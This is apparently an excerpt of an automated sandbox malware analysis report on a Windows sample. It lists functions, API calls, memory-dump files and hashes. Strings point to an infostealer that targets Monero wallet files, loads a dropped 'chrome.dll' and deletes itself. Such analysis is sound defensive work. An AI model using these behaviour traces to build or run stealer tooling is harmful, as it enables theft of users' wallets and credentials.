                          Function 000393F0 Relevance: 7.5, APIs: 4, Strings: 1, Instructions: 41stringCOMMON
                          Download Yara Rule
                          APIs
                          • StrStrA.SHLWAPI(00FDE338,00000000,00000000,?,00029F71,00000000,00FDE338,00000000), ref: 000393FC
                          • lstrcpyn.KERNEL32(002F7580,00FDE338,00FDE338,?,00029F71,00000000,00FDE338), ref: 00039420
                          • lstrlen.KERNEL32(00000000,?,00029F71,00000000,00FDE338), ref: 00039437
                          • wsprintfA.USER32 ref: 00039457
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1797151165.0000000000021000.00000040.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1796925932.0000000000020000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.000000000004C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.000000000015D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.0000000000169000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.000000000018E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.00000000002F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.000000000030A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000575000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000598000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.00000000005A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.00000000005B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799449155.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799647636.0000000000751000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799712015.0000000000752000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpynlstrlenwsprintf
                          • String ID: %s%s
                          • API String ID: 1206339513-3252725368
                          • Opcode ID: 93bbd68290d838e59f4b06b6415c3bb0b0041ff08610daae9370126a45a4c24d
                          • Instruction ID: 413e8c409a1e8d9793bec1449ff93d68648fce5e7d014f2b742c8423c3f32387
                          • Opcode Fuzzy Hash: 93bbd68290d838e59f4b06b6415c3bb0b0041ff08610daae9370126a45a4c24d
                          • Instruction Fuzzy Hash: F001DA7550410CFFCB04DFA8D948EBE7BB8EF48394F108268FA0D9B244DA31AA54DB90
                          Function 000212A0 Relevance: 7.5, APIs: 5, Instructions: 39registrymemoryCOMMON
                          Download Yara Rule
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,00000104), ref: 000212B4
                          • RtlAllocateHeap.NTDLL(00000000), ref: 000212BB
                          • RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 000212D7
                          • RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 000212F5
                          • RegCloseKey.ADVAPI32(?), ref: 000212FF
                          Memory Dump Source
                          • Source File: 00000000.00000002.1797151165.0000000000021000.00000040.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1796925932.0000000000020000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.000000000004C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.000000000015D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.0000000000169000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.000000000018E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.00000000002F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.000000000030A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000575000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000598000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.00000000005A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.00000000005B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799449155.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799647636.0000000000751000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799712015.0000000000752000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateCloseOpenProcessQueryValue
                          • String ID:
                          • API String ID: 3225020163-0
                          • Opcode ID: 09ee08a7c91380370fb313c1d4b6bed86df41abfd8e7d10041d5ced9b16cc52e
                          • Instruction ID: d3cc0c8697601f994087a24ac513fc953668c91e5eb85b7b3c561c65126558a1
                          • Opcode Fuzzy Hash: 09ee08a7c91380370fb313c1d4b6bed86df41abfd8e7d10041d5ced9b16cc52e
                          • Instruction Fuzzy Hash: A801E179A44209BFDB14DFD4EC49FAE77B8EB48751F1041A5FA05D7280D7709A14CB90
                          Function 0003CB7E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 129COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1797151165.0000000000021000.00000040.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1796925932.0000000000020000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.000000000004C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.000000000015D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.0000000000169000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.000000000018E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.00000000002F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.000000000030A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000575000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000598000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.00000000005A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.00000000005B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799449155.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799647636.0000000000751000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799712015.0000000000752000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: String___crt$Type
                          • String ID:
                          • API String ID: 2109742289-3916222277
                          • Opcode ID: caefe4c9d25af456a9abc9f472bf557c576a8c0cfc345c7cc191cae0ede8ac8d
                          • Instruction ID: 0509aada91ad680a9d47da27ef0e430f536b2d62c5d75f936f786bac750f76d7
                          • Opcode Fuzzy Hash: caefe4c9d25af456a9abc9f472bf557c576a8c0cfc345c7cc191cae0ede8ac8d
                          • Instruction Fuzzy Hash: 5741E7B011079C5EEB328B248D85FFBBBED9B45704F1444E8E98AE6143D2719A449F60
                          Function 000368D0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 70COMMON
                          Download Yara Rule
                          APIs
                          • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 00036903
                            • Part of subcall function 0003AA50: lstrcpy.KERNEL32(00040E1A,00000000), ref: 0003AA98
                            • Part of subcall function 0003ACC0: lstrlen.KERNEL32(?,00FD91F8,?,\Monero\wallet.keys,00040E1A), ref: 0003ACD5
                            • Part of subcall function 0003ACC0: lstrcpy.KERNEL32(00000000), ref: 0003AD14
                            • Part of subcall function 0003ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 0003AD22
                            • Part of subcall function 0003ABB0: lstrcpy.KERNEL32(?,00040E1A), ref: 0003AC15
                          • ShellExecuteEx.SHELL32(0000003C), ref: 000369C6
                          • ExitProcess.KERNEL32 ref: 000369F5
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1797151165.0000000000021000.00000040.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1796925932.0000000000020000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.000000000004C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.000000000015D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.0000000000169000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.000000000018E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.00000000002F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.000000000030A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000575000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000598000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.00000000005A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.00000000005B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799449155.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799647636.0000000000751000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799712015.0000000000752000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
                          • String ID: <
                          • API String ID: 1148417306-4251816714
                          • Opcode ID: 385ea6799c707ccbc9150807fcab9844ad10ac5f13e60842ae365724c13e2da3
                          • Instruction ID: 3169e1c833e9889ae948af3969ea2951b9117f3dc6c575be343b9a283e9bf0d1
                          • Opcode Fuzzy Hash: 385ea6799c707ccbc9150807fcab9844ad10ac5f13e60842ae365724c13e2da3
                          • Instruction Fuzzy Hash: 6E314FB1901218ABDB15EB90ED96FDEB77CAF08310F404199F20A67192DF706B48CF69
                          Function 00038950 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64memoryCOMMON
                          Download Yara Rule
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00040E10,00000000,?), ref: 000389BF
                          • RtlAllocateHeap.NTDLL(00000000), ref: 000389C6
                          • wsprintfA.USER32 ref: 000389E0
                            • Part of subcall function 0003AA50: lstrcpy.KERNEL32(00040E1A,00000000), ref: 0003AA98
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1797151165.0000000000021000.00000040.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1796925932.0000000000020000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.000000000004C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.000000000015D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.0000000000169000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.000000000018E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.00000000002F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.000000000030A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000575000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000598000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.00000000005A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.00000000005B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799449155.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799647636.0000000000751000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799712015.0000000000752000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateProcesslstrcpywsprintf
                          • String ID: %dx%d
                          • API String ID: 1695172769-2206825331
                          • Opcode ID: c0ecd8204cdd1084fd428e98a660f58677aa2dca698623831d7ebec294168e09
                          • Instruction ID: 3900dedf365d0c7a5f2b827ca9bbe91fd6a58d63de89c4e193e5aa1d22f3bf96
                          • Opcode Fuzzy Hash: c0ecd8204cdd1084fd428e98a660f58677aa2dca698623831d7ebec294168e09
                          • Instruction Fuzzy Hash: 152142B1A44204AFDB00DF98ED49FBEBBB8FB49750F104169FA16A7280C7755900CBA5
                          Function 0002A090 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 34libraryCOMMON
                          Download Yara Rule
                          APIs
                          • LoadLibraryA.KERNEL32(C:\ProgramData\chrome.dll), ref: 0002A098
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1797151165.0000000000021000.00000040.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1796925932.0000000000020000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.000000000004C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.000000000015D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.0000000000169000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.000000000018E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.00000000002F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.000000000030A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000575000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000598000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.00000000005A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.00000000005B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799449155.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799647636.0000000000751000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799712015.0000000000752000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: LibraryLoad
                          • String ID: C:\ProgramData\chrome.dll$connect_to_websocket$free_result
                          • API String ID: 1029625771-1545816527
                          • Opcode ID: 2f0f5f21bec03af4f6b78d27a8d2d5455e0b473e9db1e283be716c1be42ec304
                          • Instruction ID: 90cc5d6f37421d19081b3a46b4a9a41f1a1a3a393fb957b007747a8c4e632927
                          • Opcode Fuzzy Hash: 2f0f5f21bec03af4f6b78d27a8d2d5455e0b473e9db1e283be716c1be42ec304
                          • Instruction Fuzzy Hash: C3F01DB065D210AFE7109B64FD4CF7632A4EB063A4F00153CE50597190DFB458E9CB56
                          Function 00038EE0 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 20memoryCOMMON
                          Download Yara Rule
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,000000FA,?,?,000396AE,00000000), ref: 00038EEB
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00038EF2
                          • wsprintfW.USER32 ref: 00038F08
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1797151165.0000000000021000.00000040.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1796925932.0000000000020000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.000000000004C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.000000000015D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.0000000000169000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.000000000018E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.00000000002F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.000000000030A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000575000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000598000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.00000000005A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.00000000005B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799449155.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799647636.0000000000751000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799712015.0000000000752000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateProcesswsprintf
                          • String ID: %hs
                          • API String ID: 769748085-2783943728
                          • Opcode ID: cf5af3484b82b14067d64a013bb3599718ab20233c8b4162a9e8057b7fd06e89
                          • Instruction ID: 345aebf47e03c3438b3236a3bf1225b5b5007f243c6b69539a3ce9ca39ce48d5
                          • Opcode Fuzzy Hash: cf5af3484b82b14067d64a013bb3599718ab20233c8b4162a9e8057b7fd06e89
                          • Instruction Fuzzy Hash: 80E0ECB5A48309BBDB10DB94ED0EE6D77B8EB05751F0001A4FE0A97340DA71AE10DB95
                          Function 0002A990 Relevance: 6.4, APIs: 4, Instructions: 370filestringCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 0003AA50: lstrcpy.KERNEL32(00040E1A,00000000), ref: 0003AA98
                            • Part of subcall function 0003ACC0: lstrlen.KERNEL32(?,00FD91F8,?,\Monero\wallet.keys,00040E1A), ref: 0003ACD5
                            • Part of subcall function 0003ACC0: lstrcpy.KERNEL32(00000000), ref: 0003AD14
                            • Part of subcall function 0003ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 0003AD22
                            • Part of subcall function 0003ABB0: lstrcpy.KERNEL32(?,00040E1A), ref: 0003AC15
                            • Part of subcall function 00038CF0: GetSystemTime.KERNEL32(00040E1B,00FDA5D0,000405B6,?,?,000213F9,?,0000001A,00040E1B,00000000,?,00FD91F8,?,\Monero\wallet.keys,00040E1A), ref: 00038D16
                            • Part of subcall function 0003AC30: lstrcpy.KERNEL32(00000000,?), ref: 0003AC82
                            • Part of subcall function 0003AC30: lstrcat.KERNEL32(00000000), ref: 0003AC92
                          • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0002AA11
                          • lstrlen.KERNEL32(00000000,00000000), ref: 0002AB2F
                          • lstrlen.KERNEL32(00000000), ref: 0002ADEC
                            • Part of subcall function 0003AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0003AAF6
                          • DeleteFileA.KERNEL32(00000000), ref: 0002AE73
                          Memory Dump Source
                          • Source File: 00000000.00000002.1797151165.0000000000021000.00000040.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1796925932.0000000000020000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.000000000004C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.000000000015D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.0000000000169000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.000000000018E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.00000000002F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.000000000030A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000575000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000598000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.00000000005A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.00000000005B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799449155.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799647636.0000000000751000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799712015.0000000000752000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                          • String ID:
                          • API String ID: 211194620-0
                          • Opcode ID: c4ac9bdc07d064981d0a03c3c6bf5193594880fc98d9666d3c23178f84b3ef5c
                          • Instruction ID: 963d079f91051c6aecdccf56cc54942b3ead27b79cfd7ce133ca35d5accf1b75
                          • Opcode Fuzzy Hash: c4ac9bdc07d064981d0a03c3c6bf5193594880fc98d9666d3c23178f84b3ef5c
                          • Instruction Fuzzy Hash: 07E1B372A101189BCB05FBA4DDA6EEEB33DAF15300F508569F15676093EF306A48CB76
                          Function 0002D500 Relevance: 6.3, APIs: 4, Instructions: 252filestringCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 0003AA50: lstrcpy.KERNEL32(00040E1A,00000000), ref: 0003AA98
                            • Part of subcall function 0003ACC0: lstrlen.KERNEL32(?,00FD91F8,?,\Monero\wallet.keys,00040E1A), ref: 0003ACD5
                            • Part of subcall function 0003ACC0: lstrcpy.KERNEL32(00000000), ref: 0003AD14
                            • Part of subcall function 0003ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 0003AD22
                            • Part of subcall function 0003ABB0: lstrcpy.KERNEL32(?,00040E1A), ref: 0003AC15
                            • Part of subcall function 00038CF0: GetSystemTime.KERNEL32(00040E1B,00FDA5D0,000405B6,?,?,000213F9,?,0000001A,00040E1B,00000000,?,00FD91F8,?,\Monero\wallet.keys,00040E1A), ref: 00038D16
                            • Part of subcall function 0003AC30: lstrcpy.KERNEL32(00000000,?), ref: 0003AC82
                            • Part of subcall function 0003AC30: lstrcat.KERNEL32(00000000), ref: 0003AC92
                          • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0002D581
                          • lstrlen.KERNEL32(00000000), ref: 0002D798
                          • lstrlen.KERNEL32(00000000), ref: 0002D7AC
                          • DeleteFileA.KERNEL32(00000000), ref: 0002D82B
                          Memory Dump Source
                          • Source File: 00000000.00000002.1797151165.0000000000021000.00000040.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1796925932.0000000000020000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.000000000004C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.000000000015D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.0000000000169000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.000000000018E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.00000000002F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.000000000030A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000575000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000598000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.00000000005A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.00000000005B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799449155.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799647636.0000000000751000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799712015.0000000000752000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                          • String ID:
                          • API String ID: 211194620-0
                          • Opcode ID: adef66ba08337dcaa9935869bef51d2d79a73e5622ea38b842760bd7024d401f
                          • Instruction ID: 4c23308526c95f283faa767b032023d3e286cd07e48d387e211abd7af9951316
                          • Opcode Fuzzy Hash: adef66ba08337dcaa9935869bef51d2d79a73e5622ea38b842760bd7024d401f
                          • Instruction Fuzzy Hash: 7C91F272A101189BCB05FBA4ECA6EEEB33DAF15300F504569F15766093EF306A48CB66
                          Function 0002D880 Relevance: 6.2, APIs: 4, Instructions: 221filestringCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 0003AA50: lstrcpy.KERNEL32(00040E1A,00000000), ref: 0003AA98
                            • Part of subcall function 0003ACC0: lstrlen.KERNEL32(?,00FD91F8,?,\Monero\wallet.keys,00040E1A), ref: 0003ACD5
                            • Part of subcall function 0003ACC0: lstrcpy.KERNEL32(00000000), ref: 0003AD14
                            • Part of subcall function 0003ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 0003AD22
                            • Part of subcall function 0003ABB0: lstrcpy.KERNEL32(?,00040E1A), ref: 0003AC15
                            • Part of subcall function 00038CF0: GetSystemTime.KERNEL32(00040E1B,00FDA5D0,000405B6,?,?,000213F9,?,0000001A,00040E1B,00000000,?,00FD91F8,?,\Monero\wallet.keys,00040E1A), ref: 00038D16
                            • Part of subcall function 0003AC30: lstrcpy.KERNEL32(00000000,?), ref: 0003AC82
                            • Part of subcall function 0003AC30: lstrcat.KERNEL32(00000000), ref: 0003AC92
                          • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0002D901
                          • lstrlen.KERNEL32(00000000), ref: 0002DA9F
                          • lstrlen.KERNEL32(00000000), ref: 0002DAB3
                          • DeleteFileA.KERNEL32(00000000), ref: 0002DB32
                          Memory Dump Source
                          • Source File: 00000000.00000002.1797151165.0000000000021000.00000040.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1796925932.0000000000020000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.000000000004C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.000000000015D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.0000000000169000.00000040.00000001.01000000.00000003.sdmpDownload File
